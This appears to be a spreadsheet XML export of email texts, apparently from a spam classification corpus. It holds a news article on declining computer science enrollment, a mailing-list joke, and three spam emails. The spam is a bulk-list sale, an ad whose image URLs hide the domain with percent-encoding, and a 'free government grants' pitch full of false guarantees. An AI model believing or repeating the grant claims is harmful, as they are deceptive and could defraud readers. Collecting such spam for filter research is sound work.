 Computing Machinery.
 "I've heard everything from no change to modest decline to more dramatic
 declines," said Clavez, who will become the dean of science and engineering
 at Princeton University in January. "It can be hard to see this, because at
 some colleges the number of people who want to study computer science so far
 exceeds the available space. [But] it is going to have an effect."
 At Virginia Tech, enrollment of undergraduates in the computer science
 department will drop 25 percent this year, to 300. At George Washington
 University, the number of incoming freshmen who plan to study computer
 science fell by more than half this year.
 Interest in undergraduate computer science programs had grown rapidly in the
 past decade. In 1997, schools with PhD programs in computer science and
 computer engineering granted 8,063 degrees, according to the Computing
 Research Association. The numbers rose through 2001, when 17,048 degrees
 were awarded.
 The Labor Department projects that software engineering will be the
 fastest-growing occupation between 2000 and 2010, with other
 computer-related industries trailing close behind.
 But in the short term that growth may slow, based on the changes among
 college students. For example, 900 of the 2,000-plus undergraduates studying
 information technology and engineering at George Mason University were
 computer science majors last year. This year the enrollment in that major is
 down to 800, although a newly created and more general information
 technology major has attracted 200 students.
 "Having it ease off for a while is a bit of a relief," said Lloyd Griffith,
 dean of George Mason's information technology and engineering school.
 "Particularly with the field as it has been, they don't want to spend four
 years on something and then not get a job."
 Freshman enrollment for the University of Maryland's computer science major
 is expected to be about 167 this fall, down from 329 last year. Maryland
 decreased its total freshman enrollment by 11 percent, but that alone does
 not account for the drop, said Steve Halperin, dean of Maryland's College of
 Computer, Mathematical and Physical Sciences.
 "We are seeing a decrease in the number of freshmen who are declaring their
 interest in pursuing computer science as a major," Halperin said. "That's a
 factual statement. But I would say that at this point . . . we don't expect
 to see a decrease in the number of graduates. Many of the kids who are no
 longer expressing an interest in majoring in CS would have fallen off."
 Yandziak, who began at the University of Virginia on Saturday, is not
 convinced that's the case. He graduated in the top 5 percent of his class,
 with a 3.9 grade-point average, and nailed the highest possible score on his
 advanced-placement exam in computer science.
 "All of my classes have been easy for me. Math and sciences were always fun,
 so I looked for professions in which I could use those things," Yandziak
 said. "I'm just not sure I want my life to be immersed in [technology]. I
 want to do something that will contribute to the practical world."
 Harris N. Miller, president of the Information Technology Association of
 America, said the last time there was a dearth of computing professionals,
 salaries skyrocketed and workers benefited from the labor shortage.
 "There was a tremendous imbalance in the late '90s; potentially you have the
 same sort of thing going on right now. People are saying, 'I don't need this
 kind of IT training right now,' " Miller said. "Our concern as an industry
 is that if they begin to again see major declines in enrollment, down the
 road four years, as the economy picks up, once again companies are going to
 find themselves in a shortage situation."
 Economic potential weighs heavily in many student career choices, but other
 factors, including program difficulty, personal interests and social
 influences, also come into play, said Judy Hingle, director of professional
 development at the American College Counseling Association. The perception
 of computer science as an isolating, "nerdy" profession is one that many in
 the industry have tried to squelch. That stereotype went underground during
 the tech bubble but reemerged during the bust.
 "All the hipness is gone," Yandziak said. "Once we thought of the Internet
 as this thing with infinite capabilities. It was basically just a fad that
 came along."
 Lamont Thompson, a recent graduate of Calvin Coolidge Senior High School in
 the District, is headed to Morehouse College in Atlanta to study business
 marketing, with the intention of going into real estate development.
 "Technology comes natural to people my age; it's not fascinating anymore,"
 Thompson said. "To be honest with you, when I think computer science, I
 think of some guy sitting behind a computer all day in a dark room. It's a
 necessity, but I wouldn't take it any further."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Pics and thanks
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday, August 1, 2002, at 09:59 AM, Tom wrote:
 &gt; On Thu, 1 Aug 2002, CDale wrote:
 &gt;
 &gt; --]Leave it to Tom to put the one w/ his son's wanker in the center.
 &gt;
 &gt; Heck, why hide perfection:)- No bias here, nope none whatsoever.
 That reminds me of a Robin William's routine from the 80's concerning his 
 witnessing of the birth of his son (back in the day, the presence of dad 
 on the OB floor was still, well, rather Marin-ish).
 "It's a boy, and he's hung like a bear!"
 "That's the umbilical cord, Mr. Williams."
 -- whump
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 5,000 OPT-IN Email Messages ONLY $324.99
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Are you currently using a permission based Opt-in email list? Give us a 
 try. We have double opt-in lists that out perform everyone. To prove 
 it, we are offering a Special Promotion. We will send your message in
 HTML or Text,  your choice of category, to a (permission based 
 double opt-in) email list for you, for less than 6.5 cents per address!
 For Opt-in sales call Daniel: 1-949-453-8353
 CHOOSE YOUR CATEGORY.
 Categories:
 Automotive	
 Business	
 Careers	
 Computer
 Hardware
 Computer Software	
 Cooking, Food &amp; Wine	
 Education	
 Electronics
 Entertainment	
 Family	
 Fine Arts	
 Games/Sweeps
 Government	
 Health	
 Home &amp; Garden	
 Internet
 Music	
 News
 Pets	
 Real Estate	
 Shopping		
 Beauty
 Toys	
 Books	    
 Golf	
 Gambling
 Politics	
 Auctions    
 Electronics
 Investing &amp; Finance
 Manufacturing	
 Sports &amp; Recreation
 Travel &amp; Leisure
 Religion 
 Science &amp; Technology
 AND MUCH MORE!
 For Opt-in sales call Daniel at 1-949-453-8353
 Try a 5,000 opt-in e-mail for Only $325.00 and start getting sales!
 *************************************************************************************
 Start getting the exposure your website needs and the buzz it deserves.
 *************************************************************************************
 *SPECIAL ORDER OPT-IN LIST NOW AVAILABLE*
 AD EXECUTIVES 
 PROFILE:
 Reach 100% Opt-in email advertising executives and sales management decision makers.  
 These are the web's most sought after users who make significant purchase decisions for 
 their companies and specifically for their marketing related activities.  They decide on media, 
 email marketing, trade show participation, trade show booths, travel, incentives, promotions, 
 sales training, sweepstakes prizes, web advertising, hotel convention space, presentation 
 materials, presentation equipment, and much more.
 DEMOGRAPHICS/E-PROFILE
 These are highly educated, sales &amp; marketing oriented executives, some holding titles of CMO, 
 VP Marketing, VP Sales, VP Sales &amp; Marketing, Marketing Manager, Sales Manager, Media Manager, 
 Account Supervisor, and others. 
 CURRENT LIST USAGE: New to Market
 CURRENT LIST COUNT: 16,000+
 PRICE: $4,000
 COMMENTS: Very powerful and Effective!!
 CALL TO ORDER: 1-402-597-4111
 If you would like us to build a "Custom" Opt-in subscriber list for 
 you, Call Mike at 1-402-597-4111
 Are you currently Marketing on the Internet? Give us a call. 
 We have low cost tools to help you succeed.
 Would you like instant traffic? We can redirect traffic from our Search 
 Engines to your WebSite instantly! Skip the hard to get ranked within 
 a search engine game.
 Here's a deal!  Get 1,000,000 banner impressions for ONLY $1,500.
 Full stat page for tracking. Call Mike at 1-402-597-4111
 Opt-in List Owners and Brokers Welcome. NO LIST TO SMALL.
 Opt-out -    Media2001USA@yahoo.com    Please put your email address within the subject line.
 Are you currently using a permission based Opt-in email list? Give us a 
 try. We have double opt-in lists that out perform everyone. To prove 
 it, we are offering a Special Promotion. We will send your message in
 HTML or Text,  your choice of category, to a (permission based 
 double opt-in) email list for you, for less than 6.5 cents per address!
 For Opt-in sales call Daniel: 1-949-453-8353
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Money Making Home Business for You...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;A Money Making Home Business for You!&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;&lt;BODY BGCOLOR=#000000&gt;&lt;center&gt;&lt;font color="#FFFFFF"&gt;
 &lt;TABLE WIDTH=475 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD COLSPAN=2&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_01.gif" WIDTH=475 HEIGHT=78&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN=2&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_02.gif" WIDTH=475 HEIGHT=63&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_03.jpg" WIDTH=230 HEIGHT=170&gt;&lt;/TD&gt;
 &lt;TD&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_04.gif" WIDTH=245 HEIGHT=170&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_arrows.gif" WIDTH=230 HEIGHT=44&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;a href="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/"&gt;
 &lt;IMG SRC="http://impacts.%61%66%66%69%6c%61%74%65%70%6f%73%73%74%2e%63%6f%6d/biz/biz-bold/biz_ad_2_click.gif" WIDTH=245 HEIGHT=44 border=0&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;font size="1" face="verdana,arial"&gt;&amp;copy; Copyright 2002, All Rights Reserved.&lt;/font&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;__________________________________________________________&lt;BR&gt;
 &lt;font size="1" face="arial"&gt;
 Your e-mail address has been verified as one that has requested information on these offers.&lt;BR&gt;
 All e-mail addresses have been double verified. If this message has come to you in error,&lt;BR&gt;
 please click &lt;U&gt;&lt;A HREF="mailto:montage@btamail.net.cn?subject=Remove"&gt;REMOVE ME&lt;/u&gt;&lt;/A&gt; and your name will be removed from all future mailings.&lt;br&gt;&lt;/font&gt;
 __________________________________________________________&lt;/font&gt;&lt;/center&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Government Grants you $25,000!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
